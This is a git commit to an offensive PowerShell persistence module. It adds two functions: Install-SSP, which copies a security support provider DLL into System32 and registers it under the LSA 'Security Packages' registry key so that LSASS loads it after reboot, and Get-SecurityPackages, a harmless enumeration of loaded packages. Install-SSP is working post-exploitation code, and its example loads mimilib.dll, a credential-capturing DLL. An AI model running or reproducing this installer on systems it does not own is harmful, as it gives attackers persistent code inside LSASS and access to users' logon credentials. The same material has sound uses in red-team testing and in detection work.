Added Install-SSP and Get-SecurityPackages

2014-10-01 20:47:14 -04:00 · 2014-10-01 20:47:14 -04:00 · 0ca33b0347
parent 9d412f0d6a
commit 0ca33b0347
3 changed files with 303 additions and 4 deletions
--- a/Persistence/Persistence.psd1
+++ b/Persistence/Persistence.psd1
@ -4,7 +4,7 @@
 ModuleToProcess = 'Persistence.psm1'
 # Version number of this module.
-ModuleVersion = '1.0.0.0'
+ModuleVersion = '1.1.0.0'
 # ID used to uniquely identify this module
 GUID = '633d0f10-a056-41da-869d-6d2f75430195'
@ -27,9 +27,6 @@ FunctionsToExport = '*'
 # Cmdlets to export from this module
 CmdletsToExport = '*'
 # List of all modules packaged with this module.
 ModuleList = @(@{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'})
 # List of all files packaged with this module
 FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md'
--- a/Persistence/Persistence.psm1
+++ b/Persistence/Persistence.psm1
@ -697,4 +697,298 @@ $UserTriggerRemoval
    }
 #endregion
 }
 function Install-SSP
 {
 <#
 .SYNOPSIS
 Installs a security support provider (SSP) dll.
 Author: Matthew Graeber (@mattifestation)
 License: BSD 3-Clause
 Required Dependencies: None
 Optional Dependencies: None
 .DESCRIPTION
 Install-SSP installs an SSP dll. Installation involves copying the dll to
 %windir%\System32 and adding the name of the dll to
 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
 .PARAMETER Remove
 Specifies the path to the SSP dll you would like to install.
 .EXAMPLE
 Install-SSP -Path .\mimilib.dll
 .NOTES
 The SSP dll must match the OS architecture. i.e. You must have a 64-bit SSP dll
 if you are running a 64-bit OS. In order for the SSP dll to be loaded properly
 into lsass, the dll must export SpLsaModeInitialize.
 #>
    [CmdletBinding()] Param (
        [ValidateScript({Test-Path (Resolve-Path $_)})]
        [String]
        $Path
    )
    $Principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
    if(-not $Principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
    {
        throw 'Installing an SSP dll requires administrative rights. Execute this script from an elevated PowerShell prompt.'
    }
    # Resolve the full path if a relative path was provided.
    $FullDllPath = Resolve-Path $Path
    # Helper function used to determine the dll architecture
    function local:Get-PEArchitecture
    {
        Param
        (
            [Parameter( Position = 0,
                        Mandatory = $True )]
            [String]
            $Path
        )
        # Parse PE header to see if binary was compiled 32 or 64-bit
        $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read)
        [Byte[]] $MZHeader = New-Object Byte[](2)
        $FileStream.Read($MZHeader,0,2) | Out-Null
        $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
        if ($Header -ne 'MZ')
        {
            $FileStream.Close()
            Throw 'Invalid PE header.'
        }
        # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header)
        $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null
        [Byte[]] $lfanew = New-Object Byte[](4)
        # Read offset to the PE Header (will be read in reverse)
        $FileStream.Read($lfanew,0,4) | Out-Null
        $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join ''))
        # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE
        $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null
        [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2)
        # Read compiled architecture
        $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null
        $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '')
        $FileStream.Close()
        if (($Architecture -ne '014C') -and ($Architecture -ne '8664'))
        {
            Throw 'Invalid PE header or unsupported architecture.'
        }
        if ($Architecture -eq '014C')
        {
            Write-Output '32-bit'
        }
        elseif ($Architecture -eq '8664')
        {
            Write-Output '64-bit'
        }
        else
        {
            Write-Output 'Other'
        }
    }
    $DllArchitecture = Get-PEArchitecture $FullDllPath
    $OSArch = Get-WmiObject Win32_OperatingSystem | Select-Object -ExpandProperty OSArchitecture
    if ($DllArchitecture -ne $OSArch)
    {
        throw 'The operating system architecture must match the architecture of the SSP dll.'
    }
    $Dll = Get-Item $FullDllPath | Select-Object -ExpandProperty Name
    # Get the dll filename without the extension.
    # This will be added to the registry.
    $DllName = $Dll | % { % {($_ -split '\.')[0]} }
    # Enumerate all of the currently installed SSPs
    $SecurityPackages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' |
        Select-Object -ExpandProperty 'Security Packages'
    if ($SecurityPackages -contains $DllName)
    {
        throw "'$DllName' is already present in HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages."
    }
    # In case you're running 32-bit PowerShell on a 64-bit OS
    $NativeInstallDir = "$($Env:windir)\Sysnative"
    if (Test-Path $NativeInstallDir)
    {
        $InstallDir = $NativeInstallDir
    }
    else
    {
        $InstallDir = "$($Env:windir)\System32"
    }
    if (Test-Path (Join-Path $InstallDir $Dll))
    {
        throw "$Dll is already installed in $InstallDir."
    }
    # If you've made it this far, you are clear to install the SSP dll.
    Copy-Item $FullDllPath $InstallDir
    $SecurityPackages += $DllName
    Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
    Write-Verbose 'Installation complete! Reboot for changes to take effect.'
 }
 function Get-SecurityPackages
 {
 <#
 .SYNOPSIS
 Enumerates all loaded security packages (SSPs).
 Author: Matthew Graeber (@mattifestation)
 License: BSD 3-Clause
 Required Dependencies: None
 Optional Dependencies: None
 .DESCRIPTION
 Get-SecurityPackages is a wrapper for secur32!EnumerateSecurityPackages.
 It also parses the returned SecPkgInfo struct array.
 .EXAMPLE
 Get-SecurityPackages
 #>
    [CmdletBinding()] Param()
    #region P/Invoke declarations for secur32.dll
    $DynAssembly = New-Object System.Reflection.AssemblyName('SSPI')
    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI', $False)
    $FlagsConstructor = [FlagsAttribute].GetConstructor(@())
    $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @())
    $StructAttributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
    $EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])
    $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute)
    $null = $EnumBuilder.DefineLiteral('INTEGRITY', 1)
    $null = $EnumBuilder.DefineLiteral('PRIVACY', 2)
    $null = $EnumBuilder.DefineLiteral('TOKEN_ONLY', 4)
    $null = $EnumBuilder.DefineLiteral('DATAGRAM', 8)
    $null = $EnumBuilder.DefineLiteral('CONNECTION', 0x10)
    $null = $EnumBuilder.DefineLiteral('MULTI_REQUIRED', 0x20)
    $null = $EnumBuilder.DefineLiteral('CLIENT_ONLY', 0x40)
    $null = $EnumBuilder.DefineLiteral('EXTENDED_ERROR', 0x80)
    $null = $EnumBuilder.DefineLiteral('IMPERSONATION', 0x100)
    $null = $EnumBuilder.DefineLiteral('ACCEPT_WIN32_NAME', 0x200)
    $null = $EnumBuilder.DefineLiteral('STREAM', 0x400)
    $null = $EnumBuilder.DefineLiteral('NEGOTIABLE', 0x800)
    $null = $EnumBuilder.DefineLiteral('GSS_COMPATIBLE', 0x1000)
    $null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)
    $null = $EnumBuilder.DefineLiteral('ASCII_BUFFERS', 0x4000)
    $null = $EnumBuilder.DefineLiteral('FRAGMENT', 0x8000)
    $null = $EnumBuilder.DefineLiteral('MUTUAL_AUTH', 0x10000)
    $null = $EnumBuilder.DefineLiteral('DELEGATION', 0x20000)
    $null = $EnumBuilder.DefineLiteral('READONLY_WITH_CHECKSUM', 0x40000)
    $null = $EnumBuilder.DefineLiteral('RESTRICTED_TOKENS', 0x80000)
    $null = $EnumBuilder.DefineLiteral('NEGO_EXTENDER', 0x100000)
    $null = $EnumBuilder.DefineLiteral('NEGOTIABLE2', 0x200000)
    $null = $EnumBuilder.DefineLiteral('APPCONTAINER_PASSTHROUGH', 0x400000)
    $null = $EnumBuilder.DefineLiteral('APPCONTAINER_CHECKS', 0x800000)
    $SECPKG_FLAG = $EnumBuilder.CreateType()
    $TypeBuilder = $ModuleBuilder.DefineType('SSPI.SecPkgInfo', $StructAttributes, [Object], [Reflection.Emit.PackingSize]::Size8)
    $null = $TypeBuilder.DefineField('fCapabilities', $SECPKG_FLAG, 'Public')
    $null = $TypeBuilder.DefineField('wVersion', [Int16], 'Public')
    $null = $TypeBuilder.DefineField('wRPCID', [Int16], 'Public')
    $null = $TypeBuilder.DefineField('cbMaxToken', [Int32], 'Public')
    $null = $TypeBuilder.DefineField('Name', [IntPtr], 'Public')
    $null = $TypeBuilder.DefineField('Comment', [IntPtr], 'Public')
    $SecPkgInfo = $TypeBuilder.CreateType()
    $TypeBuilder = $ModuleBuilder.DefineType('SSPI.Secur32', 'Public, Class')
    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('EnumerateSecurityPackages',
        'secur32.dll',
        'Public, Static',
        [Reflection.CallingConventions]::Standard,
        [Int32],
        [Type[]] @([Int32].MakeByRefType(),
            [IntPtr].MakeByRefType()),
        [Runtime.InteropServices.CallingConvention]::Winapi,
        [Runtime.InteropServices.CharSet]::Ansi)
    $Secur32 = $TypeBuilder.CreateType()
    $PackageCount = 0
    $PackageArrayPtr = [IntPtr]::Zero
    $Result = $Secur32::EnumerateSecurityPackages([Ref] $PackageCount, [Ref] $PackageArrayPtr)
    if ($Result -ne 0)
    {
        throw "Unable to enumerate seucrity packages. Error (0x$($Result.ToString('X8')))"
    }
    if ($PackageCount -eq 0)
    {
        Write-Verbose 'There are no installed security packages.'
        return
    }
    $StructAddress = $PackageArrayPtr
    foreach ($i in 1..$PackageCount)
    {
        $SecPackageStruct = [Runtime.InteropServices.Marshal]::PtrToStructure($StructAddress, [Type] $SecPkgInfo)
        $StructAddress = [IntPtr] ($StructAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] $SecPkgInfo))
        $Name = $null
        if ($SecPackageStruct.Name -ne [IntPtr]::Zero)
        {
            $Name = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($SecPackageStruct.Name)
        }
        $Comment = $null
        if ($SecPackageStruct.Comment -ne [IntPtr]::Zero)
        {
            $Comment = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($SecPackageStruct.Comment)
        }
        $Attributes = @{
            Name = $Name
            Comment = $Comment
            Capabilities = $SecPackageStruct.fCapabilities
            MaxTokenSize = $SecPackageStruct.cbMaxToken
        }
        $SecPackage = New-Object PSObject -Property $Attributes
        $SecPackage.PSObject.TypeNames[0] = 'SECUR32.SECPKGINFO'
        $SecPackage
    }
 }
--- a/README.md
+++ b/README.md
@ -56,6 +56,14 @@ Configure elevated persistence options for the Add-Persistence function.
 Add persistence capabilities to a script.
 #### `Install-SSP`
 Installs a security support provider (SSP) dll.
 #### `Get-SecurityPackages`
 Enumerates all loaded security packages (SSPs).
 ## PETools
 **Parse/manipulate Windows portable executables.**